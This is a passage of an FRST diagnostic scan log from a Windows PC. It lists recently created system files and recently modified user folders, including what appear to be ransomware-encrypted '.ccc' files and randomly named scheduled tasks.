2015-10-13 16:10 - 2015-09-15 12:10 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-10-13 16:10 - 2015-09-15 11:36 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-10-13 16:10 - 2015-09-15 11:36 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-10-13 16:10 - 2015-09-15 11:36 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-10-13 16:10 - 2015-09-15 11:35 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-10-13 16:09 - 2015-10-01 12:06 - 00692672 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2015-10-13 16:09 - 2015-10-01 12:04 - 00616360 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2015-10-13 16:09 - 2015-10-01 12:00 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2015-10-13 16:09 - 2015-10-01 12:00 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2015-10-13 16:09 - 2015-10-01 11:50 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2015-10-13 16:09 - 2015-10-01 11:00 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2015-10-13 16:07 - 2015-07-18 07:08 - 00984448 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00901264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-eventing-provider-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-eventing-provider-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-11-10 11:19 - 2009-07-13 23:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI
2015-11-10 11:16 - 2011-12-25 10:34 - 01834783 _____ C:\Windows\WindowsUpdate.log
2015-11-10 11:14 - 2015-06-30 04:19 - 00000000 ____D C:\GOG Games
2015-11-10 11:14 - 2014-12-22 20:27 - 00000000 ____D C:\AdwCleaner
2015-11-10 11:14 - 2014-12-20 03:02 - 00000000 ____D C:\NVIDIA
2015-11-10 11:14 - 2011-12-15 16:30 - 00000000 ____D C:\MININT
2015-11-10 11:14 - 2011-04-06 14:39 - 00000000 ____D C:\Intel
2015-11-10 11:12 - 2014-11-12 15:38 - 00113220 _____ C:\Windows\setupact.log
2015-11-10 11:12 - 2014-10-26 21:30 - 00001328 _____ C:\Windows\Tasks\IJFXTJV.job
2015-11-10 11:12 - 2014-10-26 21:29 - 00001324 _____ C:\Windows\Tasks\DZZPF.job
2015-11-10 11:12 - 2014-10-26 21:27 - 00001328 _____ C:\Windows\Tasks\SXQHCMK.job
2015-11-10 11:12 - 2014-10-26 21:26 - 00001326 _____ C:\Windows\Tasks\FECWQT.job
2015-11-10 11:12 - 2012-09-11 01:48 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-10 11:12 - 2009-07-13 23:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-11-10 11:11 - 2011-12-15 15:08 - 00000000 ____D C:\ProgramData\NVIDIA
2015-11-09 20:43 - 2015-07-01 02:29 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-11-09 20:39 - 2011-12-25 12:36 - 00000000 ____D C:\Users\KW
2015-11-09 20:28 - 2009-07-13 22:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-11-09 20:28 - 2009-07-13 22:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-11-09 20:23 - 2014-12-12 20:18 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-11-09 20:23 - 2011-12-27 21:26 - 00000000 ____D C:\Users\KW\Downloads\Applications
2015-11-09 20:19 - 2015-09-26 20:19 - 00000000 ____D C:\Users\KW\Documents\SysnativeFileCollectionApp
2015-11-09 20:19 - 2015-08-09 14:52 - 00000000 ____D C:\Users\KW\Documents\The Witcher 3
2015-11-09 20:19 - 2015-02-28 01:36 - 00000000 ____D C:\Users\KW\Documents\Tunngle
2015-11-09 20:19 - 2015-01-01 21:58 - 00000000 ____D C:\Users\KW\Documents\Wondershare Video Editor
2015-11-09 20:19 - 2014-11-06 04:52 - 00000000 ____D C:\Users\KW\Documents\WB Games
2015-11-09 20:19 - 2013-04-28 00:01 - 00000000 ____D C:\Users\KW\Documents\Telltale Games
2015-11-09 20:19 - 2013-03-05 14:04 - 00000000 ____D C:\Users\KW\Documents\Tax Invoices
2015-11-09 20:18 - 2015-08-03 13:43 - 00000000 ____D C:\Users\KW\Documents\CPY_SAVES
2015-11-09 20:18 - 2015-07-01 02:29 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-11-09 20:18 - 2015-04-29 22:53 - 00000000 ____D C:\Users\KW\Documents\Dolphin Emulator
2015-11-09 20:18 - 2015-04-03 17:50 - 00000000 ____D C:\Users\KW\Documents\KoeiTecmo
2015-11-09 20:18 - 2015-01-13 03:58 - 00000000 ____D C:\Users\KW\Documents\Square Enix
2015-11-09 20:18 - 2014-12-28 02:48 - 00000000 ____D C:\Users\KW\Documents\Respawn
2015-11-09 20:18 - 2014-12-16 00:35 - 00000000 ____D C:\Users\KW\Documents\My Cheat Tables
2015-11-09 20:18 - 2014-04-06 23:27 - 00000000 ____D C:\Users\KW\Documents\Ghost Games
2015-11-09 20:18 - 2012-10-17 03:04 - 00000000 ____D C:\Users\KW\Documents\SPSSInc
2015-11-09 20:18 - 2012-09-16 23:05 - 00000000 ____D C:\Users\KW\Documents\PCSX2
2015-11-09 20:18 - 2012-08-30 19:47 - 00000000 ____D C:\Users\KW\Documents\My Games
2015-11-09 20:18 - 2012-02-23 19:41 - 00000000 ____D C:\Users\KW\Documents\College
2015-11-09 20:16 - 2015-09-12 23:00 - 00000000 ____D C:\Users\KW\Documents\ALI213
2015-11-09 20:16 - 2015-08-26 20:27 - 00002798 _____ C:\Users\KW\Desktop\Rkill.txt.ccc
2015-11-09 20:16 - 2015-04-20 00:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\MK10
2015-11-09 20:16 - 2015-04-12 20:46 - 00000000 ____D C:\Users\KW\Documents\BFH
2015-11-09 20:16 - 2015-03-11 20:37 - 00000000 ____D C:\Users\KW\AppData\Roaming\SmartSteamEmu
2015-11-09 20:16 - 2015-02-28 01:36 - 00000000 ____D C:\Users\KW\AppData\Roaming\Tunngle
2015-11-09 20:16 - 2014-12-27 22:51 - 00000000 ____D C:\Users\KW\AppData\Roaming\Origin
2015-11-09 20:16 - 2014-12-14 21:46 - 00000000 ____D C:\Users\KW\AppData\Roaming\Oracle
2015-11-09 20:16 - 2014-12-12 20:15 - 00001486 _____ C:\Users\KW\Desktop\malwarebytes log.txt.ccc
2015-11-09 20:16 - 2014-12-04 21:09 - 00000000 ____D C:\Users\KW\Documents\Assassin's Creed Unity
2015-11-09 20:16 - 2014-10-14 00:12 - 00000000 ____D C:\Users\KW\AppData\Roaming\Steam
2015-11-09 20:16 - 2014-09-26 14:52 - 00000000 ____D C:\Users\KW\AppData\Roaming\Mozilla
2015-11-09 20:16 - 2014-08-31 11:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\Xilisoft
2015-11-09 20:16 - 2014-07-10 20:08 - 00000766 _____ C:\Users\KW\Desktop\employment information (responsibilities).txt.ccc
2015-11-09 20:16 - 2014-03-24 02:11 - 00000000 ____D C:\Users\KW\Documents\Assassin's Creed IV Black Flag
2015-11-09 20:16 - 2013-07-01 16:16 - 00000000 ____D C:\Users\KW\Documents\4A Games
2015-11-09 20:16 - 2013-06-04 14:54 - 00000478 _____ C:\Users\KW\Desktop\Resume.txt.ccc
2015-11-09 20:16 - 2013-05-19 00:12 - 00000000 ____D C:\Users\KW\Documents\BioWare
2015-11-09 20:16 - 2013-05-17 19:17 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-11-09 20:16 - 2013-05-10 23:17 - 00000000 ____D C:\Users\KW\Documents\Activision
2015-11-09 20:16 - 2013-05-05 18:50 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ArmA 2
2015-11-09 20:16 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Roaming\Play withSIX
2015-11-09 20:16 - 2013-04-30 23:26 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2015-11-09 20:16 - 2013-04-30 18:27 - 00021918 _____ C:\Users\KW\Desktop\Research Proposal FINAL.docx.ccc
2015-11-09 20:16 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\New Technology Studio
2015-11-09 20:16 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenIV
2015-11-09 20:16 - 2013-04-11 17:36 - 00000000 ____D C:\Users\KW\AppData\Roaming\uTorrent
2015-11-09 20:16 - 2012-12-05 13:49 - 00000000 ____D C:\Users\KW\Desktop\New folder
2015-11-09 20:16 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Roaming\SPSSInc
2015-11-09 20:16 - 2012-09-16 20:43 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\project64 1.6
2015-11-09 20:16 - 2012-04-27 17:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\Trillium Lane
2015-11-09 20:16 - 2012-03-24 18:49 - 00000000 ____D C:\Users\KW\AppData\Roaming\PowerUp Software
2015-11-09 20:16 - 2012-02-26 17:06 - 00000000 ____D C:\Users\KW\AppData\Roaming\PACE Anti-Piracy
2015-11-09 20:16 - 2011-12-29 21:58 - 00000000 __RHD C:\Users\KW\AppData\Roaming\SecuROM
2015-11-09 20:16 - 2011-12-28 16:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\NVIDIA
2015-11-09 20:16 - 2011-12-26 18:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\WinRAR
2015-11-09 20:16 - 2011-12-25 12:36 - 00000000 ___RD C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-11-09 20:16 - 2011-12-25 12:36 - 00000000 ___RD C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-11-09 20:13 - 2015-06-30 04:15 - 00000000 ____D C:\Users\KW\AppData\Roaming\DAEMON Tools Lite
2015-11-09 20:13 - 2015-06-24 19:30 - 00000000 ____D C:\Users\KW\AppData\Roaming\avidemux
2015-11-09 20:13 - 2015-03-01 03:30 - 00000000 ____D C:\Users\KW\AppData\Roaming\Garena
2015-11-09 20:13 - 2015-03-01 03:28 - 00000000 ____D C:\Users\KW\AppData\Roaming\GarenaPlus
2015-11-09 20:13 - 2015-02-16 00:45 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Shiver Games
2015-11-09 20:13 - 2014-12-15 00:54 - 00000000 ____D C:\Users\KW\AppData\LocalLow\SKS
2015-11-09 20:13 - 2014-12-14 21:48 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Oracle
2015-11-09 20:13 - 2014-12-09 00:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\Fatshark
2015-11-09 20:13 - 2014-09-26 15:07 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Yahoo!
2015-11-09 20:13 - 2014-09-26 14:37 - 00000000 ____D C:\Users\KW\AppData\Roaming\Electronic Arts
2015-11-09 20:13 - 2014-09-26 14:33 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Unity
2015-11-09 20:13 - 2012-11-26 02:57 - 00000000 ____D C:\Users\KW\AppData\Roaming\Apple Computer
2015-11-09 20:13 - 2012-10-17 01:34 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Sun
2015-11-09 20:13 - 2012-09-19 20:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\e-academy Inc
2015-11-09 20:13 - 2012-04-27 17:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\Leadertech
2015-11-09 20:13 - 2012-04-27 17:09 - 00000000 ____D C:\Users\KW\AppData\Roaming\Digidesign
2015-11-09 20:13 - 2012-04-25 18:08 - 00000000 ____D C:\Users\KW\AppData\Roaming\Google
2015-11-09 20:13 - 2012-03-09 00:53 - 00000000 ____D C:\Users\KW\AppData\Roaming\Media Player Classic
2015-11-09 20:13 - 2012-02-20 17:02 - 00000000 ____D C:\Users\KW\AppData\Roaming\DarknessIIDemo
2015-11-09 20:13 - 2012-02-16 19:49 - 00000000 ____D C:\Users\KW\AppData\Roaming\InstallShield
2015-11-09 20:13 - 2012-02-03 22:00 - 00000000 ____D C:\Users\KW\AppData\Roaming\Assassin's Creed Revelations
2015-11-09 20:13 - 2011-12-27 21:27 - 00000000 ____D C:\Users\KW\AppData\Roaming\Malwarebytes
2015-11-09 20:13 - 2011-12-26 00:07 - 00000000 ____D C:\Users\KW\AppData\Roaming\Macromedia
2015-11-09 20:13 - 2011-12-26 00:07 - 00000000 ____D C:\Users\KW\AppData\Roaming\Adobe
2015-11-09 20:12 - 2015-05-12 01:36 - 00000000 ____D C:\Users\KW\AppData\Local\Rockstar Games
2015-11-09 20:12 - 2015-03-11 20:38 - 00000000 ____D C:\Users\KW\AppData\Local\Personal_use_only_(Darean
2015-11-09 20:12 - 2015-03-01 00:58 - 00000000 ____D C:\Users\KW\AppData\Local\Steam
2015-11-09 20:12 - 2015-01-21 03:44 - 00000000 ____D C:\Users\KW\AppData\Local\Sniper3
2015-11-09 20:12 - 2015-01-01 21:58 - 00000000 ____D C:\Users\KW\AppData\Local\Wondershare
2015-11-09 20:12 - 2014-12-27 22:50 - 00000000 ____D C:\Users\KW\AppData\Local\Origin
2015-11-09 20:12 - 2014-12-16 23:36 - 00000000 ____D C:\Users\KW\AppData\Local\Secunia PSI
2015-11-09 20:12 - 2014-11-12 21:21 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieBrowserModeList
2015-11-09 20:12 - 2014-11-12 03:18 - 00000000 ____D C:\Users\KW\AppData\Local\PAYDAY 2
2015-11-09 20:12 - 2014-09-26 14:33 - 00000000 ____D C:\Users\KW\AppData\Local\Unity
2015-11-09 20:12 - 2014-04-09 16:20 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieUserList
2015-11-09 20:12 - 2014-04-09 12:24 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieSiteList
2015-11-09 20:12 - 2014-04-06 23:32 - 00000000 ____D C:\Users\KW\AppData\Local\NVIDIA Corporation
2015-11-09 20:12 - 2014-04-06 23:31 - 00000000 ____D C:\Users\KW\AppData\Local\NVIDIA
2015-11-09 20:12 - 2013-05-10 23:17 - 00000000 ____D C:\Users\KW\AppData\Local\SKIDROW
2015-11-09 20:12 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Local\Play withSIX
2015-11-09 20:12 - 2013-04-30 23:28 - 00000000 ____D C:\Users\KW\AppData\Local\PunkBuster
2015-11-09 20:12 - 2012-02-26 17:06 - 00000000 ____D C:\Users\KW\AppData\Local\PACE Anti-Piracy
2015-11-09 20:12 - 2012-02-23 20:13 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Adobe
2015-11-09 20:12 - 2012-02-03 22:00 - 00000000 ____D C:\Users\KW\AppData\Local\Ubisoft Game Launcher
2015-11-09 20:12 - 2011-12-26 01:43 - 00000000 ____D C:\Users\KW\AppData\Local\Skyrim
2015-11-09 20:12 - 2011-12-25 12:36 - 00000000 ____D C:\Users\KW\AppData\Local\VirtualStore
2015-11-09 20:11 - 2014-09-26 14:52 - 00000000 ____D C:\Users\KW\AppData\Local\Mozilla
2015-11-09 20:11 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Local\New Technology Studio
2015-11-09 20:11 - 2012-09-20 00:15 - 00000000 ____D C:\Users\KW\AppData\Local\Microsoft Help
2015-11-09 20:04 - 2014-12-05 02:10 - 00000000 ____D C:\Users\KW\AppData\Local\CrashDumps
2015-11-09 20:04 - 2012-09-11 01:48 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-09 18:38 - 2015-06-03 18:41 - 00000000 ____D C:\Users\KW\AppData\Local\GWX
2015-11-09 18:38 - 2014-12-15 23:40 - 00000000 ____D C:\Users\KW\AppData\Local\ICSharpCode.net
2015-11-09 18:38 - 2014-09-26 14:56 - 00000000 ____D C:\Users\KW\AppData\Local\Macromedia
2015-11-09 18:38 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Local\IsolatedStorage
2015-11-09 18:38 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Local\javasharedresources
2015-11-09 18:38 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Local\IBM
2015-11-09 18:38 - 2012-04-25 18:07 - 00000000 ____D C:\Users\KW\AppData\Local\Google
2015-11-09 18:38 - 2011-06-23 18:16 - 00000000 ___HD C:\Users\KW\AppData\Local\M72LASVTGjeVLt
2015-11-09 18:37 - 2015-09-05 02:16 - 00000000 ____D C:\Users\KW\AppData\Local\CEF
2015-11-09 18:37 - 2015-08-23 21:10 - 00000000 ____D C:\Users\KW\AppData\Local\EMU
2015-11-09 18:37 - 2015-08-18 23:20 - 00000000 ____D C:\ProgramData\{D612DEA7-41A3-483A-9F90-A49A62502B1B}
2015-11-09 18:37 - 2015-06-30 04:58 - 00000000 ____D C:\ProgramData\GOG.com
2015-11-09 18:37 - 2015-06-30 04:19 - 00000000 ____D C:\Users\KW\AppData\Local\Disc_Soft_Ltd
2015-11-09 18:37 - 2015-03-05 20:11 - 00000000 ____D C:\Users\KW\AppData\Local\BANDAI NAMCO Games
2015-11-09 18:37 - 2015-03-01 03:27 - 00000000 ____D C:\ProgramData\GarenaMessenger
2015-11-09 18:37 - 2015-01-01 21:59 - 00000000 ____D C:\ProgramData\Wondershare
2015-11-09 18:37 - 2014-12-27 22:49 - 00000000 ____D C:\ProgramData\Origin
2015-11-09 18:37 - 2014-12-14 21:44 - 00000000 ____D C:\ProgramData\Oracle
2015-11-09 18:37 - 2014-12-13 00:31 - 00000000 ____D C:\ProgramData\Sophos
2015-11-09 18:37 - 2014-12-09 02:50 - 00000000 ____D C:\Users\KW\AppData\Local\Chromium
2015-11-09 18:37 - 2014-12-05 01:00 - 00000000 ____D C:\ProgramData\RogueKiller
2015-11-09 18:37 - 2014-12-05 00:17 - 00000000 ____D C:\ProgramData\HitmanPro
2015-11-09 18:37 - 2014-11-12 15:39 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieBrowserModeList
2015-11-09 18:37 - 2014-11-12 03:15 - 00000000 ____D C:\ProgramData\PAYDAY 2
2015-11-09 18:37 - 2014-09-26 15:07 - 00000000 ____D C:\ProgramData\Yahoo!
2015-11-09 18:37 - 2014-09-26 14:52 - 00000000 ____D C:\ProgramData\Mozilla
2015-11-09 18:37 - 2014-08-31 11:54 - 00000000 ____D C:\ProgramData\Xilisoft
2015-11-09 18:37 - 2014-04-09 12:26 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieUserList
2015-11-09 18:37 - 2014-04-09 12:26 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieSiteList
2015-11-09 18:37 - 2014-03-24 02:11 - 00000000 ____D C:\ProgramData\Steam
2015-11-09 18:37 - 2013-10-14 16:17 - 00000000 ____D C:\Users\KW\AppData\Local\avgchrome
2015-11-09 18:37 - 2013-07-01 16:13 - 00000000 ____D C:\Users\KW\AppData\Local\4A Games
2015-11-09 18:37 - 2013-05-21 23:12 - 00000000 ____D C:\Users\KW\AppData\Local\FLT
2015-11-09 18:37 - 2013-05-20 16:33 - 00000000 ____D C:\ProgramData\RELOADED
2015-11-09 18:37 - 2013-05-19 00:14 - 00000000 ____D C:\Users\KW\AppData\Local\EA Games
2015-11-09 18:37 - 2013-05-05 20:36 - 00000000 ____D C:\Users\KW\AppData\Local\ArmA 2
2015-11-09 18:37 - 2013-05-05 18:38 - 00000000 ____D C:\Users\KW\AppData\Local\Downloaded Installations
2015-11-09 18:37 - 2013-04-30 23:28 - 00000000 ____D C:\ProgramData\Orbit
2015-11-09 18:37 - 2013-04-28 00:01 - 00000000 ____D C:\ProgramData\REVOLT
2015-11-09 18:37 - 2012-11-26 02:57 - 00000000 ____D C:\Users\KW\AppData\Local\Apple Computer
2015-11-09 18:37 - 2012-11-26 02:56 - 00000000 ____D C:\Users\KW\AppData\Local\Apple
2015-11-09 18:37 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\.spss
2015-11-09 18:37 - 2012-10-17 02:52 - 00000000 ____D C:\ProgramData\SafeNet Sentinel
2015-11-09 18:37 - 2012-10-17 01:37 - 00000000 ____D C:\ProgramData\Sun
2015-11-09 18:37 - 2012-10-17 01:36 - 00000000 ____D C:\ProgramData\McAfee
2015-11-09 18:37 - 2012-08-28 21:06 - 00000000 ____D C:\ProgramData\Ubisoft
2015-11-09 18:37 - 2012-04-25 18:07 - 00000000 ____D C:\ProgramData\Google
2015-11-09 18:37 - 2012-04-25 18:06 - 00000000 ____D C:\Users\KW\AppData\Local\Deployment
2015-11-09 18:37 - 2012-04-25 18:06 - 00000000 ____D C:\Users\KW\AppData\Local\Apps\2.0
2015-11-09 18:37 - 2012-03-24 18:37 - 00000000 ____D C:\ProgramData\PowerUp Software
2015-11-09 18:37 - 2012-03-08 10:44 - 00000000 ____D C:\Users\KW\AppData\Local\dxhr
2015-11-09 18:37 - 2012-03-08 10:43 - 00000000 ____D C:\Users\KW\AppData\Local\28050
2015-11-09 18:37 - 2012-03-07 18:32 - 00000000 ____D C:\Users\KW\AppData\Local\FalloutNV
2015-11-09 18:37 - 2012-02-26 17:44 - 00000000 ____D C:\ProgramData\InstallShield
